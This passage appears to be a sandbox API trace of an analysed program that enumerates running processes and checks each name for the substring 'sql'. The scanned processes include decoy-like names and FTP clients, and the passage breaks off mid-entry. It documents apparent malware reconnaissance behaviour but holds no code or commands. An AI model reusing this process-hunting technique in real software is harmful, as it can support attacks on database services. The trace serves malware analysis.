(lpFirst="installed.exe", lpSrch="sql") returned 0x0 [0165.316] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0165.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0165.317] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x3585fa8 [0165.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x3585fa8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0165.317] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0165.317] StrStrIA (lpFirst="references compounds.exe", lpSrch="sql") returned 0x0 [0165.317] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0165.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0165.319] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x35970a8 [0165.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x35970a8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0165.319] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0165.319] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="sql") returned 0x0 [0165.319] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0165.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0165.321] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3596fe8 [0165.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x3596fe8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0165.321] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0165.321] StrStrIA (lpFirst="registered try.exe", lpSrch="sql") returned 0x0 [0165.321] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0165.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0165.322] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x3585ee0 [0165.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x3585ee0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0165.323] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0165.323] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="sql") returned 0x0 [0165.323] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0165.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0165.324] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3584310 [0165.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x3584310, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0165.324] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0165.324] StrStrIA (lpFirst="invite.exe", lpSrch="sql") returned 0x0 [0165.324] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0165.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0165.326] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3584328 [0165.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x3584328, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0165.326] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0165.326] StrStrIA (lpFirst="idol.exe", lpSrch="sql") returned 0x0 [0165.326] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0165.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0165.327] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x3585f58 [0165.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x3585f58, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0165.327] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0165.328] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="sql") returned 0x0 [0165.328] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0165.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0165.329] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x3585d00 [0165.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x3585d00, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0165.329] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0165.329] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="sql") returned 0x0 [0165.330] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0165.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0165.331] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3584280 [0165.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x3584280, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0165.331] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0165.331] StrStrIA (lpFirst="powell_jane.exe", lpSrch="sql") returned 0x0 [0165.331] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0165.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0165.333] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x35970c8 [0165.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x35970c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0165.333] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0165.333] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="sql") returned 0x0 [0165.333] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0165.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0165.334] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3584928 [0165.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x3584928, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0165.334] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0165.334] StrStrIA (lpFirst="gainedshape.exe", lpSrch="sql") returned 0x0 [0165.334] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0165.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0165.349] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3597228 [0165.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x3597228, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0165.349] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0165.349] StrStrIA (lpFirst="opens-versions.exe", lpSrch="sql") returned 0x0 [0165.349] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0165.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0165.351] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x3586188 [0165.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x3586188, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0165.351] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0165.351] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="sql") returned 0x0 [0165.351] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0165.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0165.353] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3584838 [0165.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x3584838, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0165.353] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0165.353] StrStrIA (lpFirst="3dftp.exe", lpSrch="sql") returned 0x0 [0165.354] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0165.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0165.355] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3597108 [0165.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x3597108, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0165.355] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0165.355] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="sql") returned 0x0 [0165.355] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0165.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0165.723] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3584a30 [0165.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x3584a30, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0165.723] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0165.723] StrStrIA (lpFirst="alftp.exe", lpSrch="sql") returned 0x0 [0165.723] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0165.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0165.725] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3584a60 [0165.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x3584a60, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0165.725] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0165.725] StrStrIA (lpFirst="barca.exe", lpSrch="sql") returned 0x0 [0165.725] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0165.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0165.726] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3584880 [0165.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x3584880, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0165.727] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0165.727] StrStrIA (lpFirst="bitkinex.exe", lpSrch="sql") returned 0x0 [0165.727] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0165.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0165.728] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3584ad8 [0165.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x3584ad8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0165.728] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0165.728] StrStrIA (lpFirst="coreftp.exe", lpSrch="sql") returned 0x0 [0165.728] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0165.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0165.729] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x357e468 [0165.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x357e468, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0165.730] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0165.730] StrStrIA (lpFirst="far.exe", lpSrch="sql") returned 0x0 [0165.730] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0165.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0165.731] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35848b0 [0165.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x35848b0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0165.731] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0165.731] StrStrIA (lpFirst="filezilla.exe", lpSrch="sql") returned 0x0 [0165.731] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0165.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0165.733] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3584940 [0165.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x3584940, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0165.733] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0165.733] StrStrIA (lpFirst="flashfxp.exe", lpSrch="sql") returned 0x0 [0165.733] Process32NextW (in: hSnapshot=0x3d4, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0165.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0165.735] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3584a18 [0165.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x3584a18, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 